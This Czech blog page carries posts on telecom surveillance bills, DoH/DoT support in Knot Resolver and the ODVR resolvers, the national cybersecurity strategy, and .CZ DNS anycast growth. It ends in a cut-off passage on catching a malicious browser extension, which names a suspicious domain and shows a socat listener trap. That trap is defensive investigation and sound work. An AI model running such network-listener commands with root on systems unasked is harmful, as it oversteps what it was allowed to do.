Návrh zákona, kterým se mění některé zákony v souvislosti se zákonem o lobbování
Novela zákona o svobodném přístupu k informacím
Novela zákona o střetu zájmů
Návrh Etického kodexu poslance

Od 10. 12. 9:00

77. schůze

Novela zákona o některých opatřeních ke zmírnění dopadů epidemie koronaviru SARS CoV-2 na osoby účastnící se soudního řízení, poškozené, oběti trestných činů a právnické osoby

Od 10. 12. 14:30

Ano, zákon o elektronických komunikací stále čeká na první čtení a v tomto stavu se překulí do nového roku a bude doufat v zázrak na lednové schůzi. To ale nebrání tomu, aby už nevznikaly první pozměňovací návrhy. Úplné prvenství v systému sněmovny získala paní poslankyně Monika Červíčková (ANO) s návrhem na povinnou registraci předplacených SIM karet a to způsobem, kdy prodejce předplacené karty (ano, ta milá paní u pokladny v Lidlu) bude mít pravomoc získat od vás rodné číslo (u cizinců jméno, příjmení, datum narození a místo narození) a předat tyto údaje dotyčnému operátorovi. Není to nic nového, téměř stejné znění navrhovala v meziresortním připomínkovém řízení BISka.

A aby toho nebylo málo, členové telekomunikační sekce Asociace kritické infrastruktury si všimli, že návrh obsahuje rozšíření oprávněných orgánů o Úřad pro ochranu hospodářské soutěže, a prudce se proti tomu ohradili.

Aby toho nebylo málo, Jan CibulkaIuridicum Remedium spustili kampaň na projekt „Konec plošnému skladování metadat o našich životech“. Cílem projektu je „dosáhnout změny české legislativy a vykopnout plošný sběr našich metadat, tohoto Velkého bratra, konečně ze hry.“

Mezitím Ministerstvo zdravotnictví připravilo novelu zákona o ochraně veřejného zdraví, který v části čtrnácté mění zákon o elektronických komunikací tak, že Státní hygienická služba bude mít přístup k provozním a lokalizačním údajům osob fyzických osob prokazatelně onemocnělých infekčním onemocněním. Tečka. Návrh neprošel meziresortem a se stanoviskem předsedkyně Legislativní rady vlády mířil rovnou na vládu. Díky včasnému hlasitému nesouhlasu jej vláda neprojednala. Snad si někdo uvědomil, že je naprostý nesmysl, aby úředník Státní hygienické služby měl přístup k provozním a lokalizačním údajům, pokud zrovna máte chřipku. Ano, chřipka je infekční onemocnění.

Pevně doufám, že po vynuceném meziresortu už tato část návrhu v zákoně nebude. Úřad pro ochranu osobních údajů to shrnuje velmi přesně – návrh není způsobilý dalšího legislativního procesu a musí se zásadně přepracovat. Regulace zpracování osobních údajů je mimořádně nekvalitní, DPIA má jen formální podobu, důvodová zpráva není skutečnou důvodovou zprávou. Proti je také ČTÚ, které „nesouhlasí se zavedením § 89a do zákona o elektronických komunikacích, a to z důvodů ústavních, právních, technických i procedurálních.“

Je šílené, že tak špatně napsaný, nesystémový, a tak masivně do soukromí prolamující se návrh dopluje až před dveře jednacího sálu vlády ve Strakovce. Protože všechny tyhle diletantské mokré sny „sledovačů“ ohrožují všechny legitimní nástroje státu v boji proti kriminalitě v kybernetickém prostoru.

Summa summarum z implementace evropského Kodexu se může stát hezky třaskavý nosič, což v předvolební sněmovně není nikdy dobrá zpráva.

Alert – mojeID – moje radost. Mám rád Hradec Králové. Mám na něj krásné vzpomínky, město se mi líbí, pochází z něj skvělá kapela Vyhoukaná sowa. A teď ho mám ještě radši, když vidím, že v rámci nabídky svých služeb občanům města dokáže aktivně využívat nástroje elektronické identifikace, včetně služby mojeID. Jak uvedl uživatel @d4nys3k na Twitteru, už jen ta podpora IPv6 chybí…

Bohužel chybí i webu „Elektronická dálniční známka“. Takže pozor! Zopakujeme si základní slovíčka. Vím, že se ve státní správě vyměnilo spousta lidí, ale usnesení vlády č. 727 z roku 2009 a usnesení vlády č. 982 z roku 2013 stále platí. Weby státní správy mají běhat na IPv4 a IPv6. Možná to jen kolegové z Ministerstva průmyslu a obchodu (kteří mají IPv6 v gesci) zapomněli říct kolegům na Ministerstvu dopravy.

A příště otevřeme bruselský vánoční balíček. #staytuned

Kategorie:

DoH na ODVR ostře a v Chrome

Út, 12/01/2020 - 08:40

Od loňského května, kdy jsme oznámili spuštění experimentálního provozu DNS over HTTPS (zkráceně DoH) na našich Otevřených DNSSEC Validujících Resolverech (ODVR) byly na těchto našich resolverech odbaveny miliardy DNS dotazů. Za tu dobu ale jen neplynul čas a DNS, ale ODVR jsme kompletně přesunuli na novou anycast infrastrukturu, oddělenou od infrastruktury pro .CZ doménu. Navíc jsme průběžně optimalizovali provoz jak celého ODVR, tak již zmíněného DoH. Jeho implementace v Knot Resolveru, který naše ODVR pohání, nebyla, hlavně z počátku, úplně stabilní a jsme moc rádi, že nám naši uživatelé pomáhali s jejím laděním. Podíl DoH na celkovém provozu ODVR jen výjimečně přesahuje dvě procenta.

Poslední, ale o to větší změnou, byl upgrade Knot Resolveru na ODVR na verzi 5.2.0, který jsme provedli tento týden. Přinesl zejména nativní podporu DoH (na rozdíl od významně používanějšího DoT, který dosahuje 20 procent z celkového provozu na ODVR, a který má tuto podporu v Knot Resolveru už od verze 1.1.0). DoH běží po upgrade na našem ODVR nově pouze na modernějším a výkonnějším HTTP/2. Kompatibilitu s HTTP/1 vývojáři KNOTa naopak odstranili, protože HTTP/1 je pro efektivní a bezchybný provoz DoH nevhodný. Dále jsme změnili výchozí TLS pro DoH a DoT na verzi 1.2 a vypnuli naopak podporu zastaralým verzím TLS 1.0 a 1.1. Více se o novinkách v Knot Resolveru 5.2.0, zejména těch okolo DoH a DoT, dočtete v blogpostu Tomáše Křížka.

Naší aktivity okolo DoH si již letos na jaře všimli v Googlu. Podpora DoH se totiž postupně dostává a vylepšuje v internetových prohlížečích a my jsme rádi, že se Google rozhodl dát uživatelům možnost zvolit, jakého poskytovatele DoH v prohlížeči Chrome využije. A nezapomněl při tom ani na nás. Stačilo se řídit instrukcemi dle tohoto návodu a vykomunikovat s nimi několik nejasností, upřesnit podmínky provozování na našem webu apod. Možnost zvolit si DoH poskytovatele, kterému důvěřujete (uživatelsky přívětivě) v prohlížeči Chrome pak byla odložena z důvodu pandemie, ve druhé polovině roku se tam ale objevila a my jsme netrpělivě čekali, kdy přijde řada také na nás. Stalo se tak v prohlížeči Chrome 87. Zatím je volba dostupná pouze na Windows a Androidu, s podporou Linuxu se počítá v příštím roce. Dále OS Chrome od 84 provádí tzv. auto-upgrade, tedy pokud máte v OS nastaven DNS resolver na ODVR, prohlížeč Chrome automaticky přejde na DoH. Naše nové DoH na ODVR tak nyní může zkusit každý. Lze nastavit opravdu jednoduše, aniž byste museli opisovat IP adresy apod. Jsme moc zvědaví, jak se v budoucnu změní podíl provozu DoH vůči celku na ODVR, podpora od Google je předzvěstí růstu této varianty šifrovaného DNS provozu.

Kategorie:

Šifrované DNS v Knot Resolveru: DoT a DoH

Pá, 11/27/2020 - 18:45

V tomto příspěvku popíšeme rozdíly mezi dvěma rozšířenými protokoly pro šifrování DNS: DNS-over-TLS (DoT) a DNS-over-HTTPS (DoH). Porovnáme technické aspekty těchto protokolů a jejich vliv na soukromí uživatelů. Představíme také novou vestavěnou podporu DoH v Knot Resolveru a vysvětlíme některá naše rozhodnutí při její implementaci.

Overhead a složitost protokolu

Než se pustíme do podrobností, koukněme na následující diagram, který stručně ilustruje klíčové rozdíly mezi DoT a DoH. První věc, které si můžete všimnout, je to, že DoH je uveden hned dvakrát: jako DoH s protokolem HTTP/2 a DoH s protokolem HTTP/1.1. Kromě podobného názvu nemají tyto protokoly nic společného – zatímco HTTP/2 je protokol binární, HTTP/1.1 je textově orientovaný.

Obrázek porovnává obsah protokolů DoT a DoH uvnitř šifrované vrstvy TLS. Modrá a fialová políčka představují datovou část vyměňovaných DNS zpráv, zbytek je pouze overhead protokolu.

V DoT je overhead naprosto minimalistický: je to jen dvoubajtová délka před každou DNS zprávou.

V DoH je situace složitější, protože navíc k existujícím vrstvám je tam celý HTTP protokol. Pokud se ptáte, k jakému účelu slouží v porovnání s DoT, nejste sami. Každopádně může posloužit jako potenciálně zranitelné místo nebo poskytnout metadata pro podrobnější identifikaci uživatele či aplikace.

DNS-over-TLS (DoT)

V posledních letech byla navržena různá řešení přinášející důvěrnost do protokolu DNS. Jedním z takových prvních pokusů byl DNSCrypt, který ale nebyl standardizován. Místo toho byl v roce 2016 standardizován DNS-over-TLS (DoT) jako RFC7858. Jen několik měsíců po první publikaci RFC byla jeho podpora přidána do Knot Resolveru ve verzi 1.1.0.

Přechod z DNS-over-TCP (který byl součástí DNS od jeho vzniku) na DNS-over-TLS byl přirozený. DoT jednoduše převzal stávající protokol DNS a zabalil jej do zabezpečené relace TLS. Toto poskytlo potřebnou důvěrnost mezi dvěma koncovými body prostřednictvím šifrování vyměňovaných DNS zpráv.

Ve srovnání s UDP je jediným overheadem protokolu DoT (uvnitř šifrované vrstvy) dvou bajtová informace o délce před každou DNS zprávou. Ve srovnání s protokolem TCP je protokol DoT identický. Jediný skutečný overhead DoT pochází výhradně z vrstvy TLS.

Podobně jako u DNS-over-TCP, přes jedno DoT spojení lze odeslat více dotazů. U dotazů je možné využít „pipelining“ – odesílat je průběžně bez čekání na odpověď. Server může také reagovat na dotazy tzv. „out-of-order“, což znamená, že bez ohledu na to, kolik paralelních dotazů klient odešle, nebudou se navzájem blokovat – každý dotaz obdrží ze serveru odpověď, jakmile bude k dispozici.

Stojí za zmínku, že použití TLS s sebou nese nové obavy o soukromí. Pro dotazy odeslané přes UDP je IP adresa jediným identifikačním údajem. Není možné rozlišovat mezi vícero klienty nebo zařízeními se stejnou IP adresou (nebo za NAT).

Ovšem při použití vrstvy TLS jak v DoT, tak i v DoH, klient musí navázat spojení. Všechny dotazy odeslané přes toto navázané spojení musí nevyhnutelně patřit danému klientovi. Technika „TLS Session Resumption“ navíc umožňuje propojit klientské dotazy také napříč následujícími spojeními.

DNS-over-HTTPS (DoH)

Přestože byl problém důvěrnosti DNS v podstatě vyřešen pomocí DoT, v roce 2018 se objevil nový standard (RC8484) – DNS-over-HTTPS (DoH). DoH používá tři vrstvy: TCP, TLS a HTTP, zatímco DoT používá pouze TCP a TLS. Pokud jde o důvěrnost, DoT a DoH jsou si rovné, jelikož oba používají vrstvu TLS pro šifrování.

Protokol DoH učinil velmi ambiciózní sliby, jako je Server Push nebo bezresolverové DNS, ale ty se v praxi ukazují jako obtížně implementovatelné. Při multiplexování DNS a HTTP přes stejné spojení vyvstávají velké problémy se soukromím a jinými oblastmi. Namísto avizovaných skvělých nových funkcí nám tedy zbyl overhead protokolu HTTP a nové potenciální zranitelnosti či obavy o soukromí (jako je identifikace klienta/zařízení pomocí HTTP hlaviček).

Kromě toho, jak je znázorněno na obrázku na začátku článku, DoH není ve skutečnosti jedním protokolem, protože závisí na používané verzi HTTP. Zatímco DoH-over-HTTP/2 může dosáhnout podobného výkonu jako DoT, DoH-over-HTTP/1.1 to nedokáže – a bylo by špatným nápadem ho použít pro tento účel. Dokonce i  RFC8484 uvádí, že HTTP/2 je minimální doporučená verze pro DoH. Jedním z hlavních problémů HTTP/1.1, který řeší HTTP/2, je head-of-line blokování na úrovni aplikačního protokolu.

DoT i DoH využívající HTTP/2 umožňují odesílat odpovědi na dotazy nezávisle na pořadí, ve kterém dorazily. Naproti tomu HTTP/1.1 musí odeslat odpovědi ve stejném pořadí, v jakém dorazily dotazy. To znamená, že pokud odpověď na jakýkoli dotaz trvá dlouho, tak mezitím blokuje všechny ostatní odpovědi přes stejné spojení, dokud není blokující dotaz vyřešen.

DoH v Knot Resolveru

Vzhledem k popularitě tohoto protokolu jsme v roce 2019 implementovali prototyp DoH ve verzi 4.0.0. K poskytování služby DoH jsme využili modulární architekturu Knot Resolveru a náš stávající HTTP modul. Jelikož pro tento modul používáme knihovnu lua-http, nemuseli jsme se starat o nuance implementace HTTP.

Nicméně, mělo to několik nevýhod: přítomnost oddělené vrstvy pro šifrování soketů (implementované závislostmi lua-http), zavedení dalších závislostí, složitější konfigurace atd. Zkušební provoz také ukázal, že náš http modul není vhodný pro rozsáhlé nasazení DoH kvůli četným problémům se stabilitou a výkonem.

Zvažovali jsme alternativní možnosti nasazení, jako je například samostatný proxy server pro DoH, který může překládat HTTPS požadavky klienta do prostého DNS. Jedním z takových možných řešení je použití dnsdist s Knot Resolverem.

Nakonec jsme se rozhodli poskytnout vestavěnou podporu pro DoH, abychom dosáhli vynikajícího výkonu a mnohem jednodušší konfigurace pouze s jedinou komponentou – samotným resolverem. Nativní vestavěná podpora DoH v byla implementována ve verzi 5.2.0. To nás nevyhnutelně vystavilo nuancím implementace protokolu HTTP.

Někdo by mohl namítnout, že existují knihovny, které zvládají více verzí HTTP, například libcurl, které skrývají složitosti protokolu HTTP. Tyto knihovny mohou posloužit pro implementaci klientských aplikací, ale pro naše vysoce výkonné použití na serveru nebyly vhodné. To souvisí i s tím, že naše architektura již umožňuje vytvářet a asynchronně zpracovávat velké množství šifrovaných soketů.

Nakonec jsme se rozhodli použít libnghttp2. Další implementace resolveru, Unbound, nezávisle zvolila stejný přístup a knihovnu pro přidání podpory DoH v jejich nejnovější verzi (1.12.0).

Jak napovídá název, libnghttp2 podporuje pouze HTTP/2. To znamená, že do budoucna bude Knot Resolver podporovat pouze DoH pomocí HTTP/2. Naše předchozí implementace je stále k dispozici, ale byla označena jako zastaralá a v budoucích verzích bude odstraněna.

Vzhledem k tomu, že považujeme odebrání podpory HTTP/1.1 za zpětně nekompatibilní změnu, nepřevedli jsme uživatele automaticky na novou implementaci DoH v 5.2.0. Všem provozovatelům Knot Resolveru doporučujeme postupně přejít na nový modul.

Výkon a latence

Existuje ještě další nevýhoda používání šifrovaného DNS. Navázání spojení TLS je nákladné z hlediska jak prostředků, tak latence. Naše testy ukázaly, že opětovné použití stejného spojení hraje významnou roli ve snížení latence i zatížení procesoru.

Pokud jde o výkon serveru, nejvýznamnějším faktorem je algoritmus používaný pro TLS certifikát. Pokud to s nasazením DoT nebo DoH myslíte vážně, nezapomeňte použít certifikát založený na eliptických křivkách. Overhead HTTP/2 v DoH ve srovnání s DoT překvapivě není tak dramatický, jak jsme očekávali, ale je rozhodně měřitelný.

Pokud jde o snížení latence pro klienty, byly navrženy různé techniky ke snížení počtu roundtripů potřebných k navázání TCP resp. TLS spojení, jako je například TCP Fast Open nebo TLS Early Start. Vypořádat se s nimi je obtížné a jejich podpora je omezená.

TCP také trpí problémem head-of-line blokování na úrovni transportního protokolu. Zdá se, že konečným řešením by mohlo být upuštění od TCP ve prospěch jiného protokolu, jako je QUIC. Možná, že se v budoucnu DNS-over-QUIC ukáže být lepší než DoT nebo DoH.

DoH na úrovni aplikace

DNS-over-HTTPS je často propagován jako úžasný přínos pro soukromí uživatelů. Moderní prohlížeče poskytují podporu DoH a můžete si dokonce vybrat svého oblíbeného poskytovatele cloudového DNS z velmi krátkého předem nakonfigurovaného seznamu. Avšak než tak učiníte, pojďme zvážit důsledky takové volby.

Dejme tomu, že jste v nedůvěryhodné lokální síti, jako je internetová kavárna nebo hotel. V tomto scénáři, pokud vaším cílem je vyhnout se resolveru lokální sítě a raději šifrovat dotazy a odeslat je na jiný resolver někde na Internetu, DoH a DoT úplně postačí pro ochranu vašich dotazů před místní sítí – poskytují vám důvěrnost vůči vybranému resolveru. V tomto scénáři by se vám spíše vyplatilo použít VPN, která dokáže ochránit veškerý provoz spolu se všemi dotazy.

Na druhou stranu, co když jste v důvěryhodné lokální síti? Pokud máte kontrolu nad lokální sítí nebo důvěřujete jejímu správci, o důvěrnost svých dotazů vůči místnímu resolveru se pravděpodobně nemusíte příliš starat. Co by vás mohlo zajímat z hlediska soukromí, je odesílání metadat identifikujících aplikace spolu s dotazy DNS velkému poskytovateli cloudových služeb, který má jak schopnost, tak i motivaci ke zneužití těchto dat.

Bohužel, to je přesně to, co umožňuje podpora DoH v prohlížečích. Volba použití DoH na úrovni aplikace může nakonec ve skutečnosti zhoršit vaše soukromí.

DoT pro lepší soukromí

Pokud se obáváte o svoje soukromí, pak je možná lepším řešením nastavení lokálního (nebo systémového) resolveru a použití DoT k přesměrování provozu na resolver podle vaší volby.

Pokud se za vaším vlastním resolverem nachází více aplikací a zařízení, stávají se nejen nerozlišitelnými pro provozovatele cílového resolveru, ale také sdílejí lokální mezipaměť. Tím získáváte rychlejší odpovědi a odesíláte méně dotazů na cílový resolver. A co je nejdůležitější, pokud používáte DoT, žádná metadata pro identifikaci aplikací neopustí důvěryhodnou síť.

Nicméně, jak v případě DoT, tak i DoH, je tu stále otázka, jak vybrat důvěryhodný resolver. Bohužel, odpověď na tuto otázku není jednoduchá a rozhodně není ani univerzální. Možná budete muset vytvořit nebo zvážit vlastní model hrozeb a rozhodnout, komu chcete důvěřovat.

Vaše rozhodnutí může být ovlivněno vaší zeměpisnou polohou, stejně jako politickým režimem země, ve které se nacházíte. Může být nejlepší důvěřovat svému poskytovateli internetu, velkému poskytovateli cloudových služeb, menšímu otevřenému resolveru a nebo přímo autoritativním serverům (pokud se rozhodnete provozovat vlastní iterativní resolver).

Knot Resolver poskytuje jak DoT, tak DoH

V tomto příspěvku jsem zkusil popsat problémy a technické zkušenosti s implementací DoH v Knot Resolveru. Nastínil jsem řadu problémů, které přináší DoH, ale nevyskytují se v DoT.

Popsal jsem komplikace, které přichází se zavedením protokolu HTTP do stacku protokolu DNS. Nevyhnutelně to přináší další potenciální zranitelnosti, nižší výkon a také negativní dopad na soukromí uživatelů kvůli možnému zneužití nově zasílaných metadat.

DoT i DoH (na serverové straně) jsou nativně podporovány v Knot Resolveru 5.2.0 a máte možnost sami zvolit, které protokoly nabídnete svým uživatelům.

A na závěr mějte na paměti, že šifrované protokoly DNS řeší jiný problém než DNSSEC. Zatímco DoT a DoH poskytují důvěrnost komunikace, DNSSEC zaručuje důvěryhodnost odpovědí. Tyto technologie se vzájemně doplňují a je nejlepší použít obojí!

Kategorie:

Krátké vlny (9. díl): Nová strategie kybernetické bezpečnosti a výprodej úředníků

Čt, 11/26/2020 - 09:58

Výhodou krátkých vln je způsob jejich šíření v atmosféře – díky mnohonásobným odrazům, k nimž dochází na ionizovaných částicích ve vyšších vrstvách (ionosféra), není nutná přímá dohlednost mezi vysílačem a přijímačem, takže jejich vzájemná vzdálenost může dosáhnout i tisíců až desítek tisíc kilometrů. Slabinou jsou naopak nestabilní podmínky šíření. Prostřednictvím krátkých vln se často vysílají zahraniční programy rozhlasových stanic do zemí, kde je omezená svoboda projevu nebo kde je zavedena cenzura.“ (zdroj: Wikipedia)

Z monitorů na nás křičí předvánoční slevové akce a člověk už pomalu neví, zda se z „Black Friday“ nestalo nové roční období. I česká státní správa se připravuje na výprodeje. Do konce roku bude vláda schvalovat systemizaci ministerstev a státních úřadu pro rok 2021. To znamená, kolik úředníků v úřadě bude a případně, zda se změní struktura úřadu – přidá se sekce, zruší se odbor, vytvoří se nové oddělení. Tato akce většinou končí tak, že někteří nechtění úředníci se ocitnou mimo hru a skončí v tzv. bazénku. Zákon o státní službě tedy uvádí, že jsou postaveni mimo výkon služby (z organizačních důvodů) – na 6 měsíců za 80 % platu, ale mohou být z „bazénku“ vyloveni jiným personalistou z jiného úřadu („Potřebuješ mzdovou účetní? Vem si mzdovou účetní.“). Pokud v tomto výprodeji po úředníkovi nikdo nesáhne, rozhodne úřad o jejich propuštění a výplatě odbytného. Reorganizace běží, výprodej se chystá. Tik tak, tik tak.

Příklad výprodeje úředníků, rok 2017

Na program vlády se chystá Národní strategie kybernetické bezpečnosti, kterou zpracoval Národní úřad pro kybernetickou bezpečnosti (NÚKIB). Tento dokument už v červenci projednal a schválil Výbor pro kybernetickou bezpečnost a začátkem listopadu také Bezpečnostní rada státu a navazuje na předchozí strategii.

Strategie navazuje na úsilí České republiky v oblasti budování koherentního systému zajišťování kybernetické bezpečnosti rámcovaného předchozí Strategií. Má za cíl reflektovat postavení České republiky v oblasti kybernetické bezpečnosti a prezentovat její budoucí strategické směřování vystavěné na třech základních vizích, které jsou:

a) sebevědomě v kyberprostoru – Česká republika má vystupovat na vládní úrovni asertivně a rozhodně,

b) silná a spolehlivá spojenectví – aktivní role České republiky při vytváření dialogu v mezinárodním prostředí – zejména v euroatlantickém prostoru a

c) odolná společnost 4.0 – občané, kteří naplno využívají výhody moderních technologií a zároveň jsou schopni integrovat je do svého každodenního života tak, aby se minimalizovala kybernetická rizika.

Strategie bude do června 2021 doplněna Akčním plánem kybernetické bezpečnosti na období 2021 až 2025, kde (stejně jako nyní) budou uvedeny konkrétní úkoly. Zprávy o stavu kybernetické bezpečnosti budou předkládány i nadále do konce června každého kalendářního roku.

Dokument také rekapituluje systém kybernetické bezpečnosti z pohledu všech možných aktérů – kromě NÚKIB do systému patří jak vládní CERT (GovCERT.CZ), tak národní CERT, jehož kompetence jsou vymezeny zákonem o kybernetické bezpečnosti, funguje pod názvem CSIRT.CZ a je od roku 2011 provozován sdružením CZ.NIC.

Zahraniční politiku a vztahy v oblasti kybernetické bezpečnosti koordinuje Ministerstvo zahraničních věcí. Na systému zajišťování kybernetické bezpečnosti se podílí také zpravodajské služby. V rámci svých kompetencí působí BIS, Vojenské zpravodajství a Úřad pro zahraniční styky a informace, kteří zabezpečují, zpracovávají a analyzují informace důležité pro národní (tedy i kybernetickou) bezpečnost České republiky.

Národní centrála proti organizovanému zločinu je národním kontaktním bodem pro kybernetickou kriminalitu a národním kontaktním místem pro hlášení závadného obsahu a závadových aktivit v Internetu. Orgány činné v trestním řízení jsou tak zodpovědné za potírání a prevenci kybernetické kriminality.

Důležitou složkou systému je i výkon kybernetické obrany, za kterou je v České republice zodpovědné Vojenské zpravodajství. V této sféře se pohybuje i Armáda České republiky, konkrétně Velitelství kybernetických sil a informačních operací, které doplňuje právě činnost Vojenského zpravodajství.

Celou kompetenční matici doplňují další orgány jako například Ministerstvo školství, mládeže a tělovýchovy, Český telekomunikační úřad nebo Ministerstvo průmyslu a obchodu z pohledu fungování digitální ekonomiky nebo rozvoje telekomunikačního trhu.


Zdroj: Národní strategie kybernetické bezpečnosti

A právě Ministerstvo průmyslu a obchodu pořádalo 24. listopadu 2020 Seminář ke kybernetické bezpečnosti 5G sítí. Ačkoliv byl seminář anoncován s registračním linkem na účtu ministerstva na Twitteru, někteří „want-to-be“ účastníci hlásili odmítnutí registrace.

Je to škoda, program semináře sliboval pohled na kyberbezpečnost 5G sítí optikou státu, operátorů i vendorů. Z obsahu konference stojí za povšimnutí snaha pana ředitele NÚKIB Karla Řehky konsolidovat roztříštěné aktivity v oblasti obranného a bezpečnostního výzkumu na dotčených resortech. Skvělé bylo i vystoupení pana prorektora Polčáka z Masarykovy univerzity v Brně, který souhlasí, aby kybernetická bezpečnost byla součástí aktivní politiky, neboť politici si musí uvědomit, že za ni nesou politickou odpovědnost. Politický problém nevidí ani tak v bezpečnosti zařízení nebo služeb, to má patřit expertům, ale spíše v otázce autonomie a suverenity. Je nutné se dívat na to, kdo technologie a systémy na trh dodává.

Seminář byl dozajista zajímavý a snad se podaří alespoň brzy zveřejnit nahrávku z této akce.

A začátek prosince nám možná z Bruselu přinese zveřejnění návrhu revize směrnice o kybernetické bezpečnosti. #staytuned

Kategorie:

Follow the DNS

Út, 11/24/2020 - 06:30

V dnešní době již to tak „nefrčí“, ale na začátku tohoto tisíciletí přinesla sílící globalizace společně s rozmachem moderních technologií a hlavně Internetu pojem „Follow the Sun“. Pro mladší nebo starší, co to již zapomněli, ve stručnosti o co šlo. Například při provozu online služeb, které musí typicky fungovat nepřetržitě a uživatelé k nim mohou přistupovat odkudkoliv a kdykoliv, se může stát, že služba přestane fungovat nebo ji uživatel neumí použít. Kdykoliv. Jak zajistit technickou podporu takové službě, aniž byste v jednom časovém pásmu nutili pracovníky bdít, když je noc? Rozprostřete takové pracovníky po světě tak, že máte kdykoliv někoho, kdo má den (the Sun nad hlavou) a může tedy podporu online služby zajistit. A když to ten pracovník nezvládne dořešit, předá to dalšímu, který je směrem po sluníčku, aby práci dokončil. To, že se pak neměřil čas vyřešení požadavku v hodinách, ale v počtu oběhnutí požadavku kolem Země, je věc podružná.

Proč jsem si na to vzpomněl? Protože jsme letos při posilování DNS infrastruktury pro .CZ doménu zažili něco podobného. Ale hezky popořadě. Po významných upgradech anycastu pro .CZ doménu v předcházejících letech (viz například tento článek), kdy jsme zprovoznili hned dva DNS uzly, každý s kapacitou 100 Gbps do NIX.CZ a odpovídajícím výkonem zapojených DNS stacků, jsme slíbili změnu dalšího postupu. A to tu, že se v budoucnu soustředíme na posilování našeho DNS anycastu v těch místech, kde vzniká hodně provozu a zároveň není v místě dobře obsloužen a latence DNS provozu je vysoká. Pro to, abychom uměli dobře vybrat takové lokality, jsme začali nově využívat analýz DNS provozu vzniklých díky projektu ADAM a také výstupů diplomové práce kolegy Lukáše, který se v ní touto problematikou zabýval. Zjednodušeně řečeno, podle reálného DNS provozu celé .CZ domény dokážeme spočítat, kde bude výhodné vybudovat další DNS uzel, aby se velká část provozu přelila právě na něj a pomohla výrazně snížit dobu komunikace DNS resolveru s naším autoritativním serverem, tedy tu výše zmíněnou latenci. Přesněji metodu popsal Lukáš ve své přednášce na IT 20. V situaci na jaře 2020 mu z jeho analýz vyšlo, že odbavení DNS provozu .CZ domény pocházejícího z regionu jižní, jihovýchodní a východní Asie bude vhodné řešit zapojením DNS uzlu do peeringového uzlu SGIX v Singapuru a že zrušený uzel na západě USA bude vhodné nahradit instalací v Seattlu a jeho zapojením do tamního SIXu. Aby byl můj příběh o Slunci úplný, v létě jsme pak ještě pomocí instalace DNS uzlu v Bratislavě a zapojením do NIX.SK a NIX.CZ vyřešili zhoršenou dostupnost jednoho ze čtyřech CZ DNS anycastů z ČR. Tak se stalo, že jsme kolem jedné, druhé hodiny ráno mohli začít domlouvat zapojení serverů v Singapuru, v naše běžné pracovní hodiny jsme pak „vyplnili Bratislavou“ a pak večer dokončili kolečko Seattlem. Je to samozřejmě hodně nadneseně řečeno, ale neraegujte si na e-mail, když víte, že odpověď až zítra znamená den zpoždění. Tím spíš, že domlouvat nákup, doručení, instalaci a zapojení serverů na dálku je mírně řečeno komplikované.

Tím bych mohl svůj blogpost ukončit, vysvětlil jsem, jak jsme to měli v létě a na podzim s tím naším „Follow the Sun and DNS“. Ale správné příběhy mají mít dobrý konec a protože jej v tomto případě mám, proč se nepochlubit. Na obrázku níže je vidět, jak se situace s dostupností našeho DNS .CZ anycastu změnila v porovnání 14 dnů října 2019 a 4 dnů v listopadu 2020. Víme, že jde o poměrně nepřesný pohled, vzhledem k neporovnatelnosti délky oněch období, ale už na těchto prvních datech je vidět, že se vážený RTT (Round-Trip-Time ~ doba potřebná pro vzájemnou komunikaci rekurzivního a autoritativního serveru) výrazně zkrátila jak v JV Asii (a Asii obecně), tak v Evropě. Významně se RTT nezměnilo v USA, což byl chtěný výsledek, protože loni v říjnu jsme místo DNS uzlu v Seattlu měli uzel v Redwood City v Kalifornii, tj. také na západním pobřeží. Ano, meziročně se zhoršilo RTT v Micronésii, ale vzhledem k velikosti tamního DNS provozu na .CZ doméně je to akceptovatelná ztráta. U všech instalací totiž platí, že kromě snižování RTT hodnotíme náklady na to vynaložené.

A pro větší přehled ještě uvedu seznam všech DNS uzlů, které jsme letos přidávali nebo upgradovali. Ve svém článku jsem, pro jednodušší napojení na „Follow the Sun“, část prací vynechal. Ve všech případech jde o instalace fyzických serverů a jak je z tabulky vidět, všechny se odlišují. Ano, na diverzitu si v DNS opravdu potrpíme.

Lokalita Anycast IX / IP tranzit OS DNS BGP Server CPU Poznámka Seattle, WA, USA A 40G / 10G Ubuntu 20 KNOT (XDP) FRR 5xDELL AMD náhrada za Restwood, CA, USA Frankfurt, Germany D 10G / 1G Ubuntu 20 NSD FRR 1xHPE AMD upgrade lokality Interxion Praha, Czech rep. C 10G / n/a Debian 10 KNOT BIRD 1xDELL Intel ISP stack CESNET Bratislava, Slovakia C 10G / n/a Ubuntu 20 Bind BIRD 1xDELL Intel Singapore B 10G / 1G Debian 10
Ubuntu 20 NSD
Bind FRR
FRR 2xDELL Intel neveřejná A 10G / 10G Ubuntu 20 KNOT (XDP) BIRD 1xDELL Intel první XDP instance
Kategorie:

Hledání škodlivého kódu mezi doplňky

Čt, 11/19/2020 - 09:58

Jak nachytat na švestkách škodlivý doplněk prohlížeče? Identifikoval jsem nestandardní chování počítače, zjistil, z jakého doplňku přichází a našel v nevinně vyhlížejícím zdrojovém kódu, které řádky jsou za to odpovědny. Přináším vám zápisek z lovení malwaru.

Před několika dny jsem si povšiml, že jistá stránka se mi připojila na doménu huffily.mydiaconal.com. Zvláštně vyhlížející jméno. O co může jít? V překladu bychom mohli říci: nakvašený můj jáhenský. Vím, že tvůrci malwaru nechávají generovat jména domén náhodně, aby se však podobala existujícím slovům. Zkusil jsem se na doménu připojit, nedala však pražádnou odpověď. Skoro bych řekl, že je nefunkční, že se jedná o omyl některého vývojáře, ale také se může jednat o krycí manévr. Doména sice neodpovídala, nicméně informace dozajista přijímala.

Prohlédl jsem stránky, zda byly zasaženy malwarem, ale nezdálo se mi. A k podezřelé doméně se stránky pak už nepřipojily, ať jsem se snažil sebevíc. Protože v profilu prohlížeče, který jsem použil, je nainstalováno několik doplňků, padlo mi logicky podezření na ně, protože doplňky považuji vedle phishingu za nejčastější slabé místo uživatelova počítače. Jak však zjistit, který z nich může být podezřelý, když nemám jistý způsob, kterým vynutit volání svého nakvašeného jáhna?
Nalíčil jsem past.

V /etc/hosts jsem přesměroval přístup k podezřelé doméně na sebe: 127.0.0.2 huffily.mydiaconal.com. Nechal jsem pak na pozadí běžet příkaz socats, který poslouchá na portu 443. Jakmile se cokoli pokusí kontaktovat našeho podezřelého, objeví se notifikace a do souboru se zapíše obsah komunikace.

sudo socat -v tcp-listen:443,fork,reuseaddr system &>> $FILE &
while
inotifywait -e modify $FILE; do
kdialog --title "TRAP!" --passivepopup "CHŇAP" 10;
done

